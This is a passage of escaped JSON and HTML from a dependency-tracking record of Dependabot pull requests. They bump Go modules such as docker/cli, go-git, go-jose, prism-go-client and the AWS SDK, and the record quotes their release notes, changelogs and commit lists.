view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.4.2+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/055a478ea9010a19d0d4674c0d0e87ade37a4223\"\u003e\u003ccode\u003e055a478\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6945\"\u003e#6945\u003c/a\u003e from thaJeztah/bump_moby\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d0f5b279e9ead4cadc6f78a2ea0ff29f652f1c50\"\u003e\u003ccode\u003ed0f5b27\u003c/code\u003e\u003c/a\u003e cmd/docker-trust: bump moby/client v0.4.1, moby/api v1.54.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/b7f37e86da572a12dcea84a2e08183132bf51e00\"\u003e\u003ccode\u003eb7f37e8\u003c/code\u003e\u003c/a\u003e vendor: github.com/moby/moby/client v0.4.1, moby/api v1.54.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c93d892f0ea0145d9e6ab99bb4aae7dbcb389d61\"\u003e\u003ccode\u003ec93d892\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6949\"\u003e#6949\u003c/a\u003e from thaJeztah/bump_utils\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/3553cafa13f691eb0a5a726f5457929c44fd55e7\"\u003e\u003ccode\u003e3553caf\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6948\"\u003e#6948\u003c/a\u003e from thaJeztah/bump_trust_deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/266f039bb52fd237388f08e874aa719d6a6e9835\"\u003e\u003ccode\u003e266f039\u003c/code\u003e\u003c/a\u003e Dockerfile: update compose to v5.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d74d3c3b163abbb084d50676da34a0055d45b855\"\u003e\u003ccode\u003ed74d3c3\u003c/code\u003e\u003c/a\u003e Dockerfile: update buildx to v0.33.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/134c2a0ed627f03cc0e6d1806f96a0b68331dc50\"\u003e\u003ccode\u003e134c2a0\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6826\"\u003e#6826\u003c/a\u003e from thaJeztah/bump_golangci_lint2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/58a7c3155b14d6696bb8cb2d7a77c48a555848c1\"\u003e\u003ccode\u003e58a7c31\u003c/code\u003e\u003c/a\u003e golangci-lint: fix lint failures from v2.10.1 upgrade\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/f37a9e663fca9f351cdbe3e18353292125108285\"\u003e\u003ccode\u003ef37a9e6\u003c/code\u003e\u003c/a\u003e Dockerfile: update golangci-lint to v2.10.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.18.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.18.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eplumbing: transport/http, Add support for followRedirects policy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2004\"\u003ego-git/go-git#2004\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/ea3e7ec9dfc54f577a01afb4dd601c0284604264\"\u003e\u003ccode\u003eea3e7ec\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2004\"\u003e#2004\u003c/a\u003e from go-git/v5-http-hardening\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/bcd20a9c525826081262a06a9ed9c3167abfcd53\"\u003e\u003ccode\u003ebcd20a9\u003c/code\u003e\u003c/a\u003e plumbing: transport/http, Add support for followRedirects policy\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/45ae193b3a60aa8ec8a3e373f7265a7819473d5f\"\u003e\u003ccode\u003e45ae193\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1944\"\u003e#1944\u003c/a\u003e from go-git/fix-perms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fda4f7464b597ff33d2dea1c026482a5e900037c\"\u003e\u003ccode\u003efda4f74\u003c/code\u003e\u003c/a\u003e storage: filesystem/dotgit, Skip writing pack files that already exist on disk\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/2212dc7caeb2a389fe2129923811ef63f75a557a\"\u003e\u003ccode\u003e2212dc7\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1941\"\u003e#1941\u003c/a\u003e from go-git/renovate/releases/v5.x-go-github.com-go-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/ebb2d7da7f5d5aebeaa0b5e13276d72d602c1ae3\"\u003e\u003ccode\u003eebb2d7d\u003c/code\u003e\u003c/a\u003e build: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY]\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.18.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and renamed in-use APIs to Konnector by \u003ca href=\"https://github.com/manoj-nutanix\"\u003e\u003ccode\u003e@​manoj-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/325\"\u003enutanix-cloud-native/prism-go-client#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add Images, Templates, and OVAs services for V4 packer migration by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/327\"\u003enutanix-cloud-native/prism-go-client#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: V4 API fixes for Objects Lite upload and configurable timeouts  by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/328\"\u003enutanix-cloud-native/prism-go-client#328\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adding api call to add customAttributes to VM by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/334\"\u003enutanix-cloud-native/prism-go-client#334\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNote\u003c/h3\u003e\n\u003cp\u003eThis prism-go-client release requires minimum PC and AOS versions v7.5. For older PC and AOS versions, please use prism-go-client v0.6.x\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Vedansh074\"\u003e\u003ccode\u003e@​Vedansh074\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/350\"\u003enutanix-cloud-native/prism-go-client#350\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.6.4\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.6.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.2...v0.6.3\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.2...v0.6.3\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/blob/main/CHANGELOG.md\"\u003egithub.com/nutanix-cloud-native/prism-go-client's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e[v0.6.1]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd transparent Basic authentication via API keys in prism-go-client\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.6.0]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd methods for Idempotence Identifiers API in v3\u003c/li\u003e\n\u003cli\u003eAPI key based authentication support in v3\u003c/li\u003e\n\u003cli\u003eAdd client method to fetch kubeconfig in Karbon\u003c/li\u003e\n\u003cli\u003eAdd converged client as utility wrapper for v4\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the underlying struct used for Cluster to swagger-generated in v3\u003c/li\u003e\n\u003cli\u003eSwitch to go-swagger generated structs for recovery plan\u003c/li\u003e\n\u003cli\u003eChange the underlying API/Client used for StorageContainers in v4\u003c/li\u003e\n\u003cli\u003eAdd defensive code to avoid panics\u003c/li\u003e\n\u003cli\u003eMove ClientOptions to environment/types\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove clients for fc \u0026amp; foundation\u003c/li\u003e\n\u003cli\u003eRemove utils package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.5]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Remove pagination handling in ListAllHost as endpoint doesn't support pagination\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.4]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Add defensive validation in v3 and v4 cache GetOrCreate to prevent panics when ManagementEndpoint has nil Address or empty required fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.3]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.2]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for creating, deleting, and listing idempotence identifiers.\u003c/li\u003e\n\u003cli\u003eadded the new v4 storage container client from clustermgmt namespace as it is based on the v4 beta APIs.\u003c/li\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the v3 VM structs to include VM vTPM configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved the v4 storage container client from storage namespace as it was based on the v4 alpha APIs which are no longer supported.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d66a76f1aec01d16e09309e3301ba0cd602a8f17\"\u003e\u003ccode\u003ed66a76f\u003c/code\u003e\u003c/a\u003e converged: add DeleteCdRom and GenerateConsoleToken to VMs service\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/0104740467e050461f068ebe465fc057af09f283\"\u003e\u003ccode\u003e0104740\u003c/code\u003e\u003c/a\u003e Adding changes to support error handling\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/c121d041c92a637edaaed197419192aa79a88141\"\u003e\u003ccode\u003ec121d04\u003c/code\u003e\u003c/a\u003e feat: Adding api call to add customAttributes to VM (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/334\"\u003e#334\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2a1c8de076a0786faa16f7ee2cd03f3d8e474e77\"\u003e\u003ccode\u003e2a1c8de\u003c/code\u003e\u003c/a\u003e chore: bump jetlify action to v0.14.0 (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/332\"\u003e#332\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/2bbbcd3103a542465227608d314804befbbcd3c1\"\u003e\u003ccode\u003e2bbbcd3\u003c/code\u003e\u003c/a\u003e fix: V4 API fixes for Objects Lite upload and configurable timeouts  (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/328\"\u003e#328\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/8b4db79f4c6750828da9466c0d49e74986b447a7\"\u003e\u003ccode\u003e8b4db79\u003c/code\u003e\u003c/a\u003e feat: add Images, Templates, and OVAs services for V4 packer migration (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/327\"\u003e#327\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/75efe03848ff09e1a6a00b8e06247d546986d677\"\u003e\u003ccode\u003e75efe03\u003c/code\u003e\u003c/a\u003e fix: removed usused Karbon APIs and renames in-use APIs to Konnector (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/issues/325\"\u003e#325\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/commit/d23758422537995b8c946153f5d2bf949b430a55\"\u003e\u003ccode\u003ed237584\u003c/code\u003e\u003c/a\u003e fix(bumup): updating ntnx-api-golang-clients to latest versions (\u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-cl...\n\n_Description has been truncated_","html_url":"https://github.com/aws/eks-anywhere/pull/10763","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/aws%2Feks-anywhere/issues/10763","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/10763/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":null,"pr_created_at":"2026-04-23T13:25:22.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4316262131","node_id":"PR_kwDOAOaWjc7U_Y2a","number":123377,"state":"closed","title":"deps(go): bump the aws-sdk-go group across 1 directory with 11 updates","user":"dependabot[bot]","labels":["area/backend","dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-23T22:52:23.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-23T13:25:22.000Z","updated_at":"2026-04-23T22:52:33.000Z","time_to_close":34021,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(go): bump","group_name":"aws-sdk-go","update_count":11,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.41.5","new_version":"1.41.6","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/credentials","old_version":"1.19.14","new_version":"1.19.15","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatch","old_version":"1.45.3","new_version":"1.56.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs","old_version":"1.51.0","new_version":"1.69.1","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.225.2","new_version":"1.299.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/oam","old_version":"1.18.3","new_version":"1.23.16","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi","old_version":"1.26.6","new_version":"1.31.11","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/s3","old_version":"1.89.2","new_version":"1.100.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/secretsmanager","old_version":"1.40.1","new_version":"1.41.6","repository_url":"https://github.com/aws/aws-sdk-go-v2"}],"path":null,"ecosystem":"go"},"body":"Bumps the aws-sdk-go group with 10 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.41.5` | `1.41.6` |\n| [github.com/aws/aws-sdk-go-v2/credentials](https://github.com/aws/aws-sdk-go-v2) | `1.19.14` | `1.19.15` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatch](https://github.com/aws/aws-sdk-go-v2) | `1.45.3` | `1.56.2` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs](https://github.com/aws/aws-sdk-go-v2) | `1.51.0` | `1.69.1` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.225.2` | `1.299.0` |\n| [github.com/aws/aws-sdk-go-v2/service/oam](https://github.com/aws/aws-sdk-go-v2) | `1.18.3` | `1.23.16` |\n| [github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.31.11` |\n| [github.com/aws/aws-sdk-go-v2/service/s3](https://github.com/aws/aws-sdk-go-v2) | `1.89.2` | `1.100.0` |\n| [github.com/aws/aws-sdk-go-v2/service/secretsmanager](https://github.com/aws/aws-sdk-go-v2) | `1.40.1` | `1.41.6` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's 